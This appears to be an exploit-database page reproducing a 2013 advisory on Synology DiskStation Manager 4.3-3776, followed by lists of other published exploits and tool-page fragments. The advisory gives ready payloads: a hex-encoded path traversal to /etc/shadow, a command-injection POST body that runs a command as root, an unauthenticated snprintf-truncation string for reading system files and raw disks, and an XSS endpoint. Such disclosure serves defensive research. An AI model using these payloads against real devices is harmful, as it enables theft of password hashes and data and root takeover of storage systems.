Menu

Search for hundreds of thousands of exploits

"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities"

Author

Exploit author

"Andrea Fabrizi"

Platform

Exploit platform

linux

Release date

Exploit published date

2013-09-12

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
**************************************************************
Title: Synology DSM multiple vulnerabilities
Version affected: <= 4.3-3776
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Synology DiskStation Manager (DSM) it's a Linux based operating
system, used for the DiskStation and RackStation products.

1] ======== Remote file download ========
Any authenticated user, even with the lowest privilege, can download
any system file, included the /etc/shadow, samba password files and
files owned by the other DSM users, without any restriction.

The vulnerability is located in "/webman/wallpaper.cgi". The CGI takes
as parameter the full path of the image to download, encoded in ASCII
Hex format.
The problem is that any file type can be downloaded (not only images)
and the path validation is very poor. In fact the CGI checks only if
the path starts with an allowed directory (like
/usr/syno/synoman/webman), and this kind of protection can be easily
bypassed using the ../ attack.

For example to access the /etc/shadow:
2f7573722f73796e6f2f73796e6f6d616e2f7765626d616e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f736861646f77
(/usr/syno/synoman/webman/../../../../etc/shadow)

------------------------------------------
GET /webman/wallpaper.cgi?path=AABBCCDDEEFF11223344 HTTP/1.1
Host: 127.0.0.1:5000
Cookie: stay_login=0; id=XXXXXXXXXXX
------------------------------------------

2] ======== Command injection ========
A command injection vulnerability, present on the
"/webman/modules/ControlPanel/ modules/externaldevices.cgi" CGI,
allows any administrative user to execute arbitrary commands on the
system, with root privileges.

------------------------------------------
POST /webman/modules/ControlPanel/modules/externaldevices.cgi HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: ls
Cookie: stay_login=0; id=XXXXXXXXXXX
Content-Length: 128

action=apply&device_name=aa&printerid=1.1.1.1-aa';$HTTP_USER_AGENT>/tmp/output+%23&printer_mode=netPrinter&eject_netprinter=true
------------------------------------------

Putting the command to execute as the User Agent string, after the
request the output will be ready into the /tmp/output file.

3] ======== Partial remote content download  ========
For the localization DSM uses some CGI, that takes the lang parameter
(e.g. "enu" for english) and returns a Json object containing the
localized strings in a dictionary format.

The strings are taken from a local file with the following path:
[current_dir]/texts/[lang_parameter_value]/strings

The "/strings" appended at the end of the path prevents a path
injection, because any value injected using the "lang" parameter will
be invalidated (in other words, it's possible to read only files named
"strings").  But, the interesting thing is that the full path of the
strings files is built using a snprintf function like that:

snprintf(&s, 0x80u, "texts/%s/strings", lang)

This means that putting a lang value big enough, it's possible to
overflow the 128 byte allowed by the snprintf and take out the
"/strings" from the built path.

For example, the lang value
"./////////////////////////////////////////////////////////////////////
///////////////////../../../../../etc/synoinfo.conf" allow to get the
/etc/synoinfo.conf file content.

The second problem is that the input file taken by the CGI must be
formatted in a key/value way: key1=string1

In other words, to get some content from a generic file it's necessary
that the file contains at least an "=" for each line (this is the
reason why I called the vulnerability "Partial remote content
download").

At first glance it may seems very limiting, but, seen that it's
possible to read directly from the disk block device (e.g.
/dev/vg1000/lv), the amount of data dumped is very huge. In my tests I
was able to dump around the 25/30% of the drive (tested with mixed
content, like documents, images, generic files). It's possible to dump
data from any drive connected. Interesting data can be also dumped
from the /proc vfs.

This vulnerability impacts two different CGI and is exploitable
without authentication by any remote user:

/scripts/uistrings.cgi
/webfm/webUI/uistrings.cgi

------------------------------------------
GET /scripts/uistrings.cgi?lang=XXXXXXXXX HTTP/1.1
Host: 127.0.0.1:5000
------------------------------------------

In the system there are two other uistrings.cgi, but are not affected.

4] XSS
A classic Cross-site scripting affects the following CGI:
/webman/info.cgi?host=XXXX&target=XXXX&add=XXXX
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2013-12-24 "Synology DSM 4.3-3810 - Directory Traversal" webapps cgi "Andrea Fabrizi"
2013-09-12 "Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities" webapps linux "Andrea Fabrizi"
2013-08-21 "Samsung DVR Firmware 1.10 - Authentication Bypass" webapps hardware "Andrea Fabrizi"
2013-01-31 "Buffalo TeraStation TS-Series - Multiple Vulnerabilities" webapps hardware "Andrea Fabrizi"
2012-10-16 "Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities" webapps hardware "Andrea Fabrizi"
2012-09-05 "QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections" webapps hardware "Andrea Fabrizi"
2011-12-18 "novell sentinel log manager 1.2.0.1 - Directory Traversal" webapps multiple "Andrea Fabrizi"
2011-01-31 "Joomla! Component com_virtuemart 1.1.6 - SQL Injection" webapps php "Andrea Fabrizi"
2009-12-05 "phpShop 0.8.1 - Multiple Vulnerabilities" webapps php "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting" webapps php "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting" webapps php "Andrea Fabrizi"
2009-10-14 "Everfocus 1.4 - EDSR Remote Authentication Bypass" webapps multiple "Andrea Fabrizi"
2009-10-09 "Docebo 3.6.0.3 - Multiple SQL Injections" webapps php "Andrea Fabrizi" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected